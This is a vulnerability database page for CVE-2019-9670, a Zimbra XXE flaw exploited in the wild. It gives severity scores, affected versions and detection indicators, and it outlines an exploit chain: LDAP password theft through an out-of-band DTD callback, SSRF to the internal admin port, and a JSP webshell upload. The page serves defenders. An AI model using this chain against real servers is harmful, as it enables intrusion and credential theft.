cbcvebase.
CVE-2019-9670
published 2019-05-29

CVE-2019-9670: mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by…

PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-07-10
Exploited in the wild
EPSS
99.99%
100.0th percentile
mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by Autodiscover/Autodiscover.xml.

Affected

2 ranges
VendorProductVersion rangeFixed in
synacorzimbra_collaboration_suite
synacorzimbra_collaboration_suite>= 8.7.0 < 8.7.118.7.11

Detection & IOCsextracted from sources · hover to see the quote

url/autodiscover
url/service/soap/
url/service/proxy/
url/service/extension/clientUploader/upload
urlhttps://127.0.0.1:7071/service/admin/soap/AuthRequest
cookieZM_ADMIN_AUTH_TOKEN
port8443
port7071
snort
Snort SID 49898
  • The XXE attack targets the Autodiscover servlet via HTTP POST to /autodiscover (or Autodiscover/Autodiscover.xml). Detect POST requests to this path on Zimbra servers, especially with XML payloads containing DOCTYPE/ENTITY declarations.
  • After XXE credential theft, the exploit chains to SSRF via /service/proxy/ with a 'target' GET parameter pointing to the internal admin port (7071). Detect requests to /service/proxy/?target=https://127.0.0.1:7071 as a strong indicator of exploitation.
  • Post-exploitation JSP webshell upload occurs via POST to /service/extension/clientUploader/upload with a multipart form-data body. Monitor for unexpected file uploads to this endpoint, particularly .jsp files.
  • Enable SSL decryption in Cisco Secure Firewall and Snort to detect exploitation of CVE-2019-9670, as the vulnerability exploits applications leveraging SSL.
  • CVE-2019-9670 is combined with CVE-2019-9621 (SSRF) in the Metasploit module for full unauthenticated RCE. Detections should account for both CVEs being chained together.
  • APT29/SVR has been observed exploiting CVE-2019-9670 in Zimbra as an initial access vector. Treat any successful exploitation as a high-priority incident given nation-state threat actor interest.
  • ·The Metasploit module defaults to SSL=true and RPORT=8443. Ensure network monitoring covers HTTPS traffic on port 8443 (and 7071 for internal admin) to detect exploitation attempts; plain HTTP inspection will miss these.
  • ·The exploit temporarily disables SSL during the XXE stage (datastore['SSL'] = false) before re-enabling it, meaning detection systems may see a brief HTTP (non-TLS) POST to /autodiscover even on a normally HTTPS-only server.
  • ·The exploit uses an out-of-band DTD callback to an attacker-controlled HTTP server to exfiltrate the Zimbra LDAP password via XXE. Egress filtering and DNS/HTTP monitoring for unexpected outbound connections from the Zimbra server are critical detection controls.
  • ·Affected versions are Zimbra Collaboration Suite v8.5 to v8.7.11 (specifically 8.7.x before 8.7.11p10). Snort SID 49898 coverage applies; verify the rule is active and SSL inspection is enabled for full coverage.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.